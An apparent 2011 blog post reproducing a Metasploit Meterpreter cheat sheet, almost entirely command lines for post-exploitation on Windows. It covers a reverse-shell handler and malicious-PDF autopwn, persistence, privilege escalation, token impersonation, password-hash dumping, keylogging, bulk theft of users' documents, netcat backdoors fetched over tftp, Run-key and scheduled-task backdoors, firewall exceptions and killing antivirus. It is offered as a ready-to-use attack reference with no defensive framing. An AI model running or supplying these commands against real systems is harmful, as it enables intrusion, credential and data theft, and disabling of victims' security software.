martes, 25 de enero de 2011

Metasploit Meterpreter Cheat Sheet Reference

Posted originally in:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 21
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set AutoRunScript persistence -r -p 21 -A -X -i 30
msf exploit(handler) > exploit -j -z

# file_autopwn

root@bt:~# rm -Rf /tmp/1
root@bt:~# mkdir /tmp/1
root@bt:~# rm -Rf ~/.msf3
root@bt:~# wget -O /tmp/file3.pdf

msf > db_driver sqlite3
msf > db_create pentest11
msf > setg LHOST
msf > setg LPORT 21
msf > setg SRVPORT 21
msf > setg LPORT_WIN32 21
msf > setg INFILENAME /tmp/file3.pdf

msf > use auxiliary/server/file_autopwn
msf auxiliary(file_autopwn) > set OUTPATH /tmp/1
msf auxiliary(file_autopwn) > set URIPATH /msf
msf auxiliary(file_autopwn) > set SSL true
msf auxiliary(file_autopwn) > set ExitOnSession false
msf auxiliary(file_autopwn) > set PAYLOAD windows/meterpreter/reverse_tcp
msf auxiliary(file_autopwn) > setg PAYLOAD windows/meterpreter/reverse_tcp
msf auxiliary(file_autopwn) > set AutoRunScript persistence -r -p 21 -A -X -i 30
msf auxiliary(file_autopwn) > run

# shows all the scripts
run [tab]

# persistence! broken ...if you use DNS name ..
run persistence -r -p 21 -A -X -i 30

run get_pidgin_creds


# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

# eslcate to system
use priv

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list top used apps
run prefetchtool -x 20

# list installed apps
run prefetchtool -p

run get_local_subnets

# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office

# alternate
download -r "%USERPROFILE%\\desktop"  ~/
download -r "%USERPROFILE%\\my documents"  ~/

# alternate to shell not SYSTEM
execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc
run winenum

# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t -c "tftp -i GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t -c "tftp -i GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4

# vnc / port fwd for linux
run vnc

# priv esc
run kitrap0d

run getgui

# somewhat broken .. google sdt cleaner  NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32

reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list

reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys

reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32

upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

migrate 520
portfwd add -L 104.4.4 -l 6666 -r -p 80"
portfwd add -L -l -r -p 6666

run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

run msf_bind
run msf_bind -p 1975



run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d
run netenum -rl -r
run netenum -st -d
run netenum -ps -r

# Windows Login Brute Force Meterpreter Script
run winbf -h

# upload a script or executable and run it

# Using Payload As A Backdoor  from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe"  /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe  -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -O "c:\Program Files\Kaspersky\avp.exe" dummy

No hay comentarios:

Publicar un comentario